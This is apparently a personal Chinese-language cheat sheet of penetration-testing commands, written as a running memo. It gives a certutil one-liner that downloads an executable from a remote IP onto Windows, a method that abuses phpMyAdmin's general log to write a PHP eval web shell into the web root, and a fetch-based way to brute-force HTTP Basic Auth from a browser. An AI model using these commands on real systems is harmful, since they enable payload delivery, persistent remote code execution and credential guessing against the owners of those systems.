写在开始
最近搞网安渗透比较多,这里列举一下常用的一些命令,用于备忘
下载文件
在windows上下载文件用的命令
certutil.exe -urlcache -split -f http://172.16.1.28:2020/a.exe a.exe
一句话木马
在phpMyAdmin中写一句话木马的一种方法,是写在phpMyAdmin的日志里
show variables like '%general%';
SET GLOBAL general_log='on'
SET GLOBAL general_log_file='C:/phpStudy/www/cc.php'
SELECT '<?php eval($_POST["cmd"]);?>';
首先是将日志文件修改为放php文件的目录,然后设置为php后缀,然后写个查询,就会把这个查询写入日志了。
在浏览器里爆破Basic Auth
如果要涉及到爆破Basic Auth,那么就需要在fetch的头里加一条,像下面这样。
headers.set('Authorization', 'Basic ' + btoa(username + ":" + password));
然后写个批量发包的就行了。如果有需要,可能需要把btoa单一个函数换成下面这种组合
window.btoa(unescape(encodeURIComponent(string)))
不过,应该用不上,不需要专门url encode之后处理。
写在最后
这个文章也是持续更新状态,如果后面看到了啥命令就会添进来,记录一下这些零零散散的东西